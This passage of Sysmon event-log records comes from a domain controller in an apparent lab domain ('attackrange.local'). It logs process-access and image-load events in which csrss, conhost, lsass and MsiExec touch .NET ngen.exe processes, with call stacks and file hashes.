14:57:23.796{A7A01FEF-EBD3-607E-870C-00000000BB01}27044228C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-860C-00000000BB01}2508c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.780{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-870C-00000000BB01}2704C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.780{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-860C-00000000BB01}2508c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.780{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-860C-00000000BB01}2508c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.764{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-840C-00000000BB01}3564c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.764{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-840C-00000000BB01}3564c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.764{A7A01FEF-EBD3-607E-840C-00000000BB01}3564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.749{A7A01FEF-EBD3-607E-850C-00000000BB01}62645364C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-840C-00000000BB01}3564c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.733{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-850C-00000000BB01}6264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.733{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-840C-00000000BB01}3564c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.733{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-840C-00000000BB01}3564c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.733{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-820C-00000000BB01}6220c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.733{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-820C-00000000BB01}6220c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.733{A7A01FEF-EBD3-607E-820C-00000000BB01}6220C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.702{A7A01FEF-EBD3-607E-830C-00000000BB01}25284960C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-820C-00000000BB01}6220c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.702{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-830C-00000000BB01}2528C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.686{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-820C-00000000BB01}6220c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.686{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-820C-00000000BB01}6220c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.686{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-800C-00000000BB01}6072c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.686{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-800C-00000000BB01}6072c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.686{A7A01FEF-EBD3-607E-800C-00000000BB01}6072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.671{A7A01FEF-EBD3-607E-810C-00000000BB01}52963008C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-800C-00000000BB01}6072c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.655{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-810C-00000000BB01}5296C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.655{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-800C-00000000BB01}6072c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.655{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-800C-00000000BB01}6072c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.639{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-7E0C-00000000BB01}1980c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.639{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-7E0C-00000000BB01}1980c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.639{A7A01FEF-EBD3-607E-7E0C-00000000BB01}1980C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.624{A7A01FEF-EBD3-607E-7F0C-00000000BB01}44445248C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-7E0C-00000000BB01}1980c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.624{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-7F0C-00000000BB01}4444C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.608{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-7E0C-00000000BB01}1980c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.608{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-7E0C-00000000BB01}1980c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 